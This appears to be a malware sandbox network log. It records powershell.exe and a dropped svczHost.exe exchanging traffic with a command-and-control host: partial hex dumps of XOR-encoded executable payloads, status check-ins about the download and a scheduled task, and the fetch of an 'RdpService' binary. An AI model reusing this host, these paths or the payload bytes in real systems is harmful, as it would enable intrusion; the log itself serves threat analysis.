                                                                                                        2024-11-08 10:11:00 UTC1369INData Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 02 d3 0c 66 01 01 01 01 01 01 01 01 f1 01 23
                                                                                                        Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDef#
                                                                                                        2024-11-08 10:11:00 UTC1369INData Raw: d4 25 01 49 8c 04 7c d7 4f 01 49 8c 0c 6f d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a6 d4 25 01 49 8c 04 71 d7 4f 01 49 8c 0c 60 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 8b d4 25 01 49 8c 04 ca d7 4f 01 49 8c 0c bd d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 6c d4 25 01 49 8c 04 bf d7 4f 01 49 8c 0c ae d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 51 d4 25 01 49 8c 04 b0 d7 4f 01 49 8c 0c a3 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 32 d4 25 01 49 8c 04 a5 d7 4f 01 49 8c 0c 94 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 17 d4 25 01 49 8c 04 96 d7 4f 01 49 8c 0c 89 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f8 d5 25 01 49 8c 04 8b d7 4f 01 49 8c 0c 7a d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 dd d5 25 01 49 8c 04 a4 d7 4f 01 49 8c 0c 97 d7 4f 01 49 82 38 01 74 00
                                                                                                        Data Ascii: %I|OIoOI8tI%IqOI`OI8tI%IOIOI8tIl%IOIOI8tIQ%IOIOI8tI2%IOIOI8tI%IOIOI8tI%IOIzOI8tI%IOIOI8t
                                                                                                        2024-11-08 10:11:00 UTC1369INData Raw: 23 d8 4f 01 49 8c 0c 12 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 55 d1 25 01 49 8c 04 14 d8 4f 01 49 8c 0c 07 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 36 d1 25 01 49 8c 04 11 d8 4f 01 49 8c 0c 00 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 1b d1 25 01 49 8c 04 0a d8 4f 01 49 8c 0c fd d9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 fc ce 25 01 49 8c 04 87 d8 4f 01 49 8c 0c 76 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e1 ce 25 01 49 8c 04 80 d8 4f 01 49 8c 0c 73 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c2 ce 25 01 49 8c 04 7d d8 4f 01 49 8c 0c 6c d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 ce 25 01 49 8c 04 be d8 4f 01 49 8c 0c b1 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 88 ce 25 01 49 8c 04 fb d8 4f 01 49 8c 0c ea d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 6d
                                                                                                        Data Ascii: #OIOI8tIU%IOIOI8tI6%IOIOI8tI%IOIOI8tI%IOIvOI8tI%IOIsOI8tI%I}OIlOI8tI%IOIOI8tI%IOIOI8tIm
                                                                                                        2024-11-08 10:11:00 UTC824INData Raw: 49 82 38 01 74 00 c2 49 8a d1 e8 e7 cb 25 01 49 8c 04 06 56 90 01 49 8a 01 49 8c 0c 3c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 cb 25 01 49 8c 04 fe 57 90 01 49 8a 01 49 8c 0c 24 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 cb 25 01 49 8c 04 e6 57 90 01 49 8a 01 49 8c 0c 0c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 cb 25 01 49 8c 04 ce 57 90 01 49 8a 01 49 8c 0c f4 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 cb 25 01 49 8c 04 c6 57 90 01 49 8a 01 49 8c 0c dc cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 cb 25 01 49 8c 04 b6 57 90 01 49 8a 01 49 8c 0c cc cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 cb 25 01 49 8c 04 a6 57 90 01 49 8a 01 49 8c 0c b4 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 cb 25 01 49 8c 04 ae 57 90 01 49 8a 01 49 8c 0c b4 cb 4f
                                                                                                        Data Ascii: I8tI%IVII<OI8tI%IWII$OI8tI%IWIIOI8tI%IWIIOI8tIg%IWIIOI8tIG%IWIIOI8tI'%IWIIOI8tI%IWIIO
                                                                                                        2024-11-08 10:11:00 UTC1369INData Raw: 01 49 8c 0c c4 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c6 25 01 49 8c 04 96 54 90 01 49 8a 01 49 8c 0c ac cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c6 25 01 49 8c 04 86 54 90 01 49 8a 01 49 8c 0c 9c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c6 25 01 49 8c 04 76 54 90 01 49 8a 01 49 8c 0c 84 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c6 25 01 49 8c 04 66 54 90 01 49 8a 01 49 8c 0c 6c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c6 25 01 49 8c 04 4e 54 90 01 49 8a 01 49 8c 0c 54 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c6 25 01 49 8c 04 36 54 90 01 49 8a 01 49 8c 0c 3c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c7 25 01 49 8c 04 26 54 90 01 49 8a 01 49 8c 0c 24 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c7 25 01 49 8c 04 0e 54 90 01 49
                                                                                                        Data Ascii: IOI8tI%ITIIOI8tI%ITIIOI8tIg%IvTIIOI8tIG%IfTIIlOI8tI'%INTIITOI8tI%I6TII<OI8tI%I&TII$OI8tI%ITI
                                                                                                        2024-11-08 10:11:00 UTC1369INData Raw: 04 d6 53 90 01 49 8a 01 49 8c 0c 5c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c3 25 01 49 8c 04 be 53 90 01 49 8a 01 49 8c 0c 44 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c3 25 01 49 8c 04 a6 53 90 01 49 8a 01 49 8c 0c 2c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c3 25 01 49 8c 04 8e 53 90 01 49 8a 01 49 8c 0c 14 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c0 25 01 49 8c 04 76 53 90 01 49 8a 01 49 8c 0c fc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c0 25 01 49 8c 04 5e 53 90 01 49 8a 01 49 8c 0c e4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c0 25 01 49 8c 04 46 53 90 01 49 8a 01 49 8c 0c cc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c0 25 01 49 8c 04 2e 53 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c0 25 01 49
                                                                                                        Data Ascii: SII\OI8tIG%ISIIDOI8tI'%ISII,OI8tI%ISIIOI8tI%IvSIIOI8tI%I^SIIOI8tI%IFSIIOI8tI%I.SIIOI8tIg%I
                                                                                                        2024-11-08 10:11:00 UTC1369INData Raw: e8 07 bc 25 01 49 8c 04 e6 4e 90 01 49 8a 01 49 8c 0c b4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bd 25 01 49 8c 04 ce 4e 90 01 49 8a 01 49 8c 0c a4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bd 25 01 49 8c 04 c6 4e 90 01 49 8a 01 49 8c 0c 8c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bd 25 01 49 8c 04 b6 4e 90 01 49 8a 01 49 8c 0c 7c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bd 25 01 49 8c 04 ae 4e 90 01 49 8a 01 49 8c 0c 64 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bd 25 01 49 8c 04 9e 4e 90 01 49 8a 01 49 8c 0c 4c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bd 25 01 49 8c 04 96 4e 90 01 49 8a 01 49 8c 0c 34 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 bd 25 01 49 8c 04 7e 4e 90 01 49 8a 01 49 8c 0c 1c c7 4f 01 49 82 38 01 74 00 c2 49 8a
                                                                                                        Data Ascii: %INIIOI8tI%INIIOI8tI%INIIOI8tI%INII|OI8tI%INIIdOI8tIg%INIILOI8tIG%INII4OI8tI'%I~NIIOI8tI
                                                                                                        2024-11-08 10:11:00 UTC1369INData Raw: 01 74 00 c2 49 8a d1 e8 a7 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 6c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 5c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b6 25 01 49 8c 04 8e 4f 90 01 49 8a 01 49 8c 0c 4c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b6 25 01 49 8c 04 7e 4f 90 01 49 8a 01 49 8c 0c 34 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b6 25 01 49 8c 04 76 4f 90 01 49 8a 01 49 8c 0c 1c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b6 25 01 49 8c 04 6e 4f 90 01 49 8a 01 49 8c 0c 04 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b7 25 01 49 8c 04 56 4f 90 01 49 8a 01 49 8c 0c ec c3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b7 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c d4 c3 4f 01 49 82
                                                                                                        Data Ascii: tI%IOIIlOI8tI%IOII\OI8tIg%IOIILOI8tIG%I~OII4OI8tI'%IvOIIOI8tI%InOIIOI8tI%IVOIIOI8tI%I>OIIOI
                                                                                                        2024-11-08 10:11:00 UTC1369INData Raw: ec be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b3 25 01 49 8c 04 76 4a 90 01 49 8a 01 49 8c 0c e4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b3 25 01 49 8c 04 5e 4a 90 01 49 8a 01 49 8c 0c cc be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b3 25 01 49 8c 04 46 4a 90 01 49 8a 01 49 8c 0c b4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b0 25 01 49 8c 04 2e 4a 90 01 49 8a 01 49 8c 0c 9c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b0 25 01 49 8c 04 1e 4a 90 01 49 8a 01 49 8c 0c 84 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b0 25 01 49 8c 04 06 4a 90 01 49 8a 01 49 8c 0c 94 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b0 25 01 49 8c 04 ee 4b 90 01 49 8a 01 49 8c 0c 7c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b0 25 01 49 8c 04 fe 4b 90 01 49 8a 01 49 8c
                                                                                                        Data Ascii: OI8tIG%IvJIIOI8tI'%I^JIIOI8tI%IFJIIOI8tI%I.JIIOI8tI%IJIIOI8tI%IJIIOI8tI%IKII|OI8tIg%IKII
                                                                                                        2024-11-08 10:11:00 UTC1369INData Raw: 01 49 8a 01 49 8c 0c 54 c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 ad 25 01 49 8c 04 0e 52 90 01 49 8a 01 49 8c 0c 54 c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 ad 25 01 49 8c 04 f6 53 90 01 49 8a 01 49 8c 0c 3c c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 ad 25 01 49 8c 04 fe 53 90 01 49 8a 01 49 8c 0c 24 c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 ad 25 01 49 8c 04 e6 53 90 01 49 8a 01 49 8c 0c 0c c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 ad 25 01 49 8c 04 0e 52 90 01 49 8a 01 49 8c 0c f4 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 ad 25 01 49 8c 04 06 52 90 01 49 8a 01 49 8c 0c dc c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 ad 25 01 49 8c 04 2e 52 90 01 49 8a 01 49 8c 0c d4 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 ad 25 01 49 8c 04 26 52
                                                                                                        Data Ascii: IITOI8tI%IRIITOI8tI%ISII<OI8tI%ISII$OI8tI%ISIIOI8tIg%IRIIOI8tIG%IRIIOI8tI'%I.RIIOI8tI%I&R


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.11.3049781172.67.137.624438236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:11:10 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce50 HTTP/1.1
                                                                                                        Content-Type: application/json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Content-Length: 200
                                                                                                        2024-11-08 10:11:10 UTC200OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                        Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
                                                                                                        2024-11-08 10:11:11 UTC942INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:11:11 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2Fu9oRC1yAmH6NuKfwQE0DfuzgcWFSqLdpg%2BETAUVyG5GOUX59l%2FDuD%2FKSZ5%2FUHq15%2Fk2IlZOJCw0zHlHWLy%2BN4HI4pmm%2Bzs2Gejp0QBD9JDksIgHwggcHQtrNhv6Sk4DG9Hd4qn%2FL7u"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=16094&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1462&recv_bytes=3411&delivery_rate=24555&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c707ba3743e3-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102170&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1150&delivery_rate=37402&cwnd=252&unsent_bytes=0&cid=d2cceffa36d4a136&ts=818&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.11.3049782172.67.137.624438236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:11:11 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce50 HTTP/1.1
                                                                                                        Content-Type: application/json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Content-Length: 97
                                                                                                        2024-11-08 10:11:11 UTC97OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                        Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
                                                                                                        2024-11-08 10:11:12 UTC933INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:11:12 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3I%2F8NJGdjbnSvASBdX%2FDsn1bwQ8YfviiOuAsJBie5hQtNepEXC8iKIwDNyDqaVFP2VkntGWcvMOq1TptofZMBbWFBiVXiuHyv33k1bENgWHnX4b%2B1MhEY4b8WwNCGCZicrvLAoPM%2FTVW"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=20689&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2211&recv_bytes=4301&delivery_rate=27623&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c70e4f1143a9-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102073&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1046&delivery_rate=37462&cwnd=252&unsent_bytes=0&cid=575e54a328fbeb9c&ts=810&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.11.3049783172.67.137.624438236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:11:14 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce50 HTTP/1.1
                                                                                                        Content-Type: application/json
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        Content-Length: 64
                                                                                                        2024-11-08 10:11:14 UTC64OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                        Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
                                                                                                        2024-11-08 10:11:15 UTC939INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:11:14 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hfmXvYqULGoljbaJgufWpVqhj6ql0nzNSSBH3ESGnH0DalT%2B43lNobtgV0Mev4tCMlwp8%2BMB2dlAmTXyFAzwtzlh36HUbUoA9d33vH8MXmi9zJomYrofiUCdODV4vHHACqTtjnLierCP"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8515&sent=5858&recv=2785&lost=0&retrans=0&sent_bytes=8376487&recv_bytes=48098&delivery_rate=51390857&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c72078494304-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=102274&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1013&delivery_rate=37427&cwnd=252&unsent_bytes=0&cid=f983d51abd1e1c74&ts=571&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.11.3049786172.67.137.624439772C:\Windows\Temp\svczHost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-08 10:11:58 UTC69OUTGET /StaticFile/RdpService/64 HTTP/1.1
                                                                                                        Host: uyt1n8ded9fb380.com
                                                                                                        2024-11-08 10:11:59 UTC1099INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 08 Nov 2024 10:11:58 GMT
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 9427456
                                                                                                        Connection: close
                                                                                                        content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                        hash: F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8q4on7W%2Bo7R5PXDB2VNKCDGGcXFcfseTFn4nsS2VDeO%2BbFl8nujMmQSSQPDYvVHlifmBez81PRZrnY7EnjLao1ACZxP324r7AfOazqVaPX%2Fyx%2Fq%2FvGUQy1ouP1grEU4EHkFNI%2FQ7Htq"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=37762&sent=38&recv=34&lost=0&retrans=0&sent_bytes=12135&recv_bytes=14152&delivery_rate=1800246&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        X-Powered-By: ARR/3.0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8df4c831eced5740-IAD
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=113261&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=707&delivery_rate=31516&cwnd=101&unsent_bytes=0&cid=0e91a90e9208781b&ts=891&x=0"
                                                                                                        2024-11-08 10:11:59 UTC270INData Raw: 0d 1a d0 40 43 40 40 40 44 40 40 40 bf bf 40 40 f8 40 40 40 40 40 40 40 00 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 41 40 40 4e 5f fa 4e 40 f4 49 8d 61 f8 41 0c 8d 61 14 28 29 33 60 30 32 2f 27 32 21 2d 60 23 21 2e 2e 2f 34 60 22 25 60 32 35 2e 60 29 2e 60 04 0f 13 60 2d 2f 24 25 6e 4d 4d 4a 64 40 40 40 40 40 40 40 ae ad 76 60 ea cc 18 33 ea cc 18 33 ea cc 18 33 e3 b4 8b 33 e4 cc 18 33 9a 4d 19 32 fd cc 18 33 ea cc 19 33 6c cd 18 33 fa 48 1b 32 f9 cc 18 33 fa 48 1c 32 d3 cc 18 33 a2 49 1d 32 e9 cc 18 33 9a 4d 1c 32 e8 cc 18 33 ea cc 18 33 eb cc 18 33 fa 48 1d 32 9c cc 18 33 a2 49 18 32 eb cc 18 33 a2 49 1a 32 eb cc 18 33 12 29 23 28 ea cc 18 33 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40
                                                                                                        Data Ascii: @C@@@D@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@A@@N_N@IaAa()3`02/'2!-`#!../4`"%`25.`).``-/$%nMMJd@@@@@@@v`33333M233l3H23H23I23M2333H23I23I23)#(3@@@@@@@@@@@@@@@
                                                                                                        2024-11-08 10:11:59 UTC1369INData Raw: 40 40 40 40 40 40 b0 40 62 40 4b 42 4e 69 40 7a 10 40 40 d0 01 40 40 5a 5c 40 d8 91 4b 40 40 50 40 40 40 40 40 00 41 40 40 40 40 50 40 40 40 42 40 40 46 40 40 40 40 40 40 40 46 40 40 40 40 40 40 40 40 00 ee 40 40 44 40 40 40 40 40 40 43 40 20 c1 40 40 50 40 40 40 40 40 40 50 40 40 40 40 40 40 40 40 50 40 40 40 40 40 40 50 40 40 40 40 40 40 40 40 40 40 50 40 40 40 40 86 e5 40 48 42 40 40 48 88 e5 40 3c 41 40 40 40 50 ee 40 f2 45 40 40 40 c0 e8 40 88 c6 45 40 40 40 40 40 40 40 40 40 40 60 ee 40 0c 54 40 40 d0 ec d9 40 5c 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 c0 ee d9 40 68 40 40 40 10 eb d9 40 00 41 40 40 40 40 40 40 40 40 40 40 40 c0 2c 40 80 4b 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 6e 34 25 38 34
                                                                                                        Data Ascii: @@@@@@@b@KBNi@z@@@@Z\@K@@P@@@@@A@@@@P@@@B@@F@@@@@@@F@@@@@@@@@@D@@@@@@C@ @@P@@@@@@P@@@@@@@@P@@@@@@P@@@@@@@@@@P@@@@@HB@@H@<A@@@P@E@@@@E@@@@@@@@@@`@T@@@\@@@@@@@@@@@@@@@@@@@@h@@@@A@@@@@@@@@@@,@K@@@@@@@@@@@@@@@@@@@@@@@@@@n4%84
                                                                                                        2024-11-08 10:11:59 UTC1369INData Raw: 40 08 cd 4d a1 ce 18 40 08 c3 79 40 35 41 83 08 cb 90 a9 82 94 68 40 08 cd 45 0b cf 18 40 08 cd 4d 7c cf 18 40 08 c3 79 40 35 41 83 08 cb 90 a9 e5 94 68 40 08 cd 45 7e cf 18 40 08 cd 4d 6f cf 18 40 08 c3 79 40 35 41 83 08 cb 90 a9 c8 94 68 40 08 cd 45 71 cf 18 40 08 cd 4d 62 cf 18 40 08 c3 79 40 35 41 83 08 cb 90 a9 2b 94 68 40 08 cd 45 64 cf 18 40 08 cd 4d 55 cf 18 40 08 c3 79 40 35 41 83 08 cb 90 a9 0e 94 68 40 08 cd 45 57 cf 18 40 08 cd 4d 48 cf 18 40 08 c3 79 40 35 41 83 08 cb 90 a9 71 94 68 40 08 cd 45 4a cf 18 40 08 cd 4d bb ce 18 40 08 c3 79 40 35 41 83 08 cb 90 a9 54 94 68 40 08 cd 45 bd ce 18 40 08 cd 4d ae ce 18 40 08 c3 79 40 35 41 83 08 cb 90 a9 b7 93 68 40 08 cd 45 58 cf 18 40 08 cd 4d 49 cf 18 40 08 c3 79 40 35 41 83 08 cb 90 a9 9a 93 68 40
